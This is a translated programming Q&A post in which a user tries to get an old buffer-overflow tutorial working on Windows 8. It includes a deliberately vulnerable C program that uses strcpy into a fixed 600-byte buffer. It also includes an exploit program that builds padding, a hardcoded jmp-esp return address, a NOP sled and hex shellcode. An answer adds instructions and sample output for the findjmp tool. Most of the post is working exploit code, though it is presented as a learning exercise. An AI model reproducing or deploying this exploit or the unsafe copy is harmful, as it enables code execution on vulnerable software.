[英]“Simple” buffer overflow in Windows 8
我試圖在C中創建兩個簡單的程序來模擬緩沖區溢出:
我找到了一個舊的教程 ,該教程為您提供了兩個程序來做類似的事情,但是要使其在64位Windows 8下運行卻有些困難。 我正在使用Visual Studio 2013編譯代碼。
第一個代碼段看起來非常簡單,並且可以:
#include <stdio.h>
#include <stdlib.h>
int foo(char *);
int main(int argc, char *argv[])
{
if(argc != 2)
return printf("Supply an argument, dude\n");
foo(argv[1]);
return 0;
}
int foo(char *input)
{
unsigned char buffer[600]="";
printf("%.8X\n", &buffer);
strcpy(buffer, input);
return 0;
}
第二個代碼可能需要進行一些編輯,但這是我遇到的問題:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define RET 0x7935EDBB /* ATTENTION!!! Change it. Search kernel32.dll
or any other library for jmp esp or call esp
instruction and then save the address */
#define TRASH 0x41
char shellcode[]=
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";
int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;
memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;
for(i=0;i<620;i++)
(*ptr++) = TRASH; //620 bytes of chunk
*(unsigned long *)&buf[620] = RET; //then return address = jmp esp, call esp
strcat(buf, "\x90\x90\x90\x90"); //small NOP sledge
strcat(buf, shellcode); //and our first shellcode
bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);
return 0;
}
我認為絕對需要更改的兩件事是: #define RET 0x7935EDBB
,也許還有shellcode。
有人有什么想法可以使它起作用嗎?
似乎RET地址可能不正確。 要找到正確的RET地址,請使用findjmp (來自Ryan Permeh)。 編譯findjmp.c並使用以下參數運行:
findjmp <DLLfile> <register>. Suppose you want to look for jumps to esp in kernel32.dll, run “findjmp kernel32.dll esp”
On Vista SP2, you should get something like this :
Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x773AF74B call esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 1 usable addresses
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.